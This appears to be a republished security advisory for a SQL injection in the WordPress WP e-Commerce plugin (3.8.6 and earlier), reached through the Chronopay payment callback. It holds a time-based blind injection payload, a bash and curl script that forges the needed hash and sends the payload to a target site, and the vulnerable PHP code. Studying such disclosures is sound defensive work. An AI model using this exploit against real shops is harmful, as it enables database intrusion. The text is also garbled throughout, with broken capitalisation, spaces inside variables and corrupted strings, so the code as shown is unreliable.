Title: WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability
Author: Miroslav Stampar (miroslav.stampar (at) gmail.com, @stamparm)
Software: http://downloads.wordpress.org/plugin/wp-e-commerce.3.8.6.zip
Tested version: 3.8.6
Annotation: the parameter $_POST["cs3"] must equal md5(md5(urldecode($_POST["cs1"])))
# The plugin has a "chronopay_salt" option, but it is set to '' by default, so the expected hash reduces to md5(md5($_POST["cs1"])) and the check gives no protection unless the key has been configured (see the description of the defective code below)
---------------
Test (POST data)
---------------
Http://www.bkjia.com /? Chronopay_callback = true
Cs2 = chronopay & cs1 =-1 AND 1 = IF (2> 1, BENCHMARK (5000000, MD5 (CHAR (115,113,108,109, 97,112), 0) % 23 & cs3 = 123f7bcd4ba53fade05886a7e77bf045 & transaction_type = rebill
Example.
#! /Bin/bash
Payload = "-1 AND 1 = IF (2> 1, BENCHMARK (5000000, MD5 (CHAR (115,113,108,109, 97,112), 0 )#"
Hash = 'echo-n $ payload | md5sum | tr-d '\ n' | sed's/\ s *-\ s * // G' | md5sum | tr-d '\ n' | sed's/\ s *-\ s * // g''
Curl -- data "cs2 = chronopay & cs1 = $ payload & cs3 = $ hash & transaction_type = rebill" http://www.site.com /? Chronopay_callback = true
---------------
Defective code
---------------
./Wp-e-commerce/wp-shopping-cart.php:
Class WP_eCommerce {
Function WP_eCommerce (){
Add_action ('ins INS _ loaded', array ($ this, 'init '), 8 );
}
Function init (){
...
$ This-> load ();
...
}
Function load (){
...
Wpsc_core_load_gateways ();
...
}
...
$ Wpec = new WP_eCommerce ();
./Wp-e-commerce/wpsc-core/wpsc-functions.php:
Function wpsc_core_load_gateways (){
Global $ nzshpcrt_gateways, $ num, $ wpsc_gateways, $ gateway_checkout_form_fields;
$ Gateway_directory = WPSC_FILE_PATH. '/wpsc-merchants ';
$ Nzshpcrt_merchant_list = wpsc_list_dir ($ gateway_directory );
$ Num = 0;
Foreach ($ nzshpcrt_merchant_list as $ nzshpcrt_merchant ){
If (stristr ($ nzshpcrt_merchant, '. php ')){
Require (WPSC_FILE_PATH. '/wpsc-merchants/'. $ nzshpcrt_merchant );
}
./Wp-e-commerce/wpsc-merchants/chronopay. php:
Function nzshpcrt_chronopay_callback ()
{
...
If (isset ($ _ GET ['chronopay _ callback']) & ($ _ GET ['chronopay _ callback'] = 'true ') & ($ _ POST ['cs2'] = 'chronopa '))
{
$ salt = get_option ('chronopay _ salt ');
// - This is '' by default and is set only if explicitly configured under
//   Store Settings -> Payments -> General Settings -> Chronopay -> Edit -> Security Key.
// - The problem is that more popular payment gateways (e.g. Google Checkout and PayPal)
//   are listed alongside it, yet every gateway file is loaded and this callback is hooked
//   on 'init' regardless of which gateway the store uses; if that setting is not explicitly
//   set, the door is wide open to a potential attacker.
$ Gen_hash = md5 ($ salt. md5 ($ _ POST ['cs1']. $ salt ));
If ($ gen_hash ==$ _ POST ['cs3'])
{
...
$ Sessionid = trim (stripslashes ($ _ POST ['cs1']);
$ Transaction_id = trim (stripslashes ($ _ POST ['transaction _ id']);
$ Verification_data ['Trans _ id'] = trim (stripslashes ($ _ POST ['transaction _ id']);
$ Verification_data ['Trans _ type'] = trim (stripslashes ($ _ POST ['transaction _ type']);
Switch ($ verification_data ['Trans _ type'])
{
...
Case 'rebill ':
$ Wpdb-> query ("Update'". WPSC_TABLE_PURCHASE_LOGS. "'set
'Processed' = '2 ',
'Transactid' = '". $ transaction_id ."',
'Date' = '". time ()."'
WHERE 'sessionid' = ". $ sessionid." LIMIT 1 ");
...
Add_action ('init ', 'nzshpcrt _ chronopay_callback ');